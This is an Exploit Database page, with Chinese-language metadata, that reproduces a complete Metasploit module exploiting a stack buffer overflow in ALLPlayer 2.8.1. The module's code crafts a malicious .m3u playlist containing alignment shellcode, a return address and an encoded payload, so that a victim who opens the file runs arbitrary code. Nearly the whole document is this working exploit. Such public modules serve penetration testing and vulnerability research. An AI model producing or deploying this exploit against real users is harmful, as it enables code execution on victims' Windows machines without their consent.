ALLPlayer – ‘.m3u’ Local Buffer Overflow (Metasploit)

• Exploit Database
• 15 阅读

• 作者： Metasploit
  日期： 2014-03-05
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/32074/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::FILEFORMAT
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'ALLPlayer M3U Buffer Overflow',
  'Description'=> %q{
  This module exploits a stack-based buffer overflow vulnerability in
  ALLPlayer 2.8.1, caused by a long string in a playlist entry.
  By persuading the victim to open a specially-crafted .M3U file, a
  remote attacker could execute arbitrary code on the system or cause
  the application to crash. This module has been tested successfully on
  Windows 7 SP1.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'metacom',# Vulnerability discovery
  'Mike Czumak',# Original exploit
  'Gabor Seljan'# Metasploit module
  ],
  'References' =>
  [
  [ 'BID', '62926' ],
  [ 'BID', '63896' ],
  [ 'EDB', '28855' ],
  [ 'EDB', '29549' ],
  [ 'EDB', '29798' ],
  [ 'EDB', '32041' ],
  [ 'OSVDB', '98283' ],
  [ 'URL', 'http://www.allplayer.org/' ]
  ],
  'DefaultOptions' =>
  {
  'ExitFunction' => 'process'
  },
  'Platform' => 'win',
  'Payload'=>
  {
  'DisableNops'=> true,
  'BadChars' => "\x00\x0a\x0d\x80\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f",
  'Space'=> 3060,
  'EncoderType'=> Msf::Encoder::Type::AlphanumUnicodeMixed,
  'EncoderOptions' =>
  {
  'BufferRegister' => 'EAX'
  }
  },
  'Targets'=>
  [
  [ ' ALLPlayer 2.8.1 / Windows 7 SP1',
  {
  'Offset' => 301,
  'Ret'=> "\x50\x45",# POP POP RET from ALLPlayer.exe
  'Nop'=> "\x6e" # ADD BYTE PTR DS:[ESI],CH
  }
  ]
  ],
  'Privileged' => false,
  'DisclosureDate' => 'Oct 09 2013',
  'DefaultTarget'=> 0))
  
  register_options(
  [
  OptString.new('FILENAME', [ false, 'The file name.', 'msf.m3u'])
  ],
  self.class)
  
  end
  
  
  def exploit
  nop = target['Nop']
  
  sploit =rand_text_alpha_upper(target['Offset'])
  sploit << "\x61\x50"# POPAD
  sploit << target.ret
  sploit << "\x53"# PUSH EBX
  sploit << nop
  sploit << "\x58"# POP EAX
  sploit << nop
  sploit << "\x05\x14\x11"# ADD EAX,0x11001400
  sploit << nop
  sploit << "\x2d\x13\x11"# SUB EAX,0x11001300
  sploit << nop
  sploit << "\x50"# PUSH EAX
  sploit << nop
  sploit << "\xc3"# RET
  sploit << nop * 109
  sploit << payload.encoded
  sploit << rand_text_alpha_upper(10000) # Generate exception
  
  # Create the file
  print_status("Creating '#{datastore['FILENAME']}' file ...")
  file_create("http://" + sploit)
  
  end
  end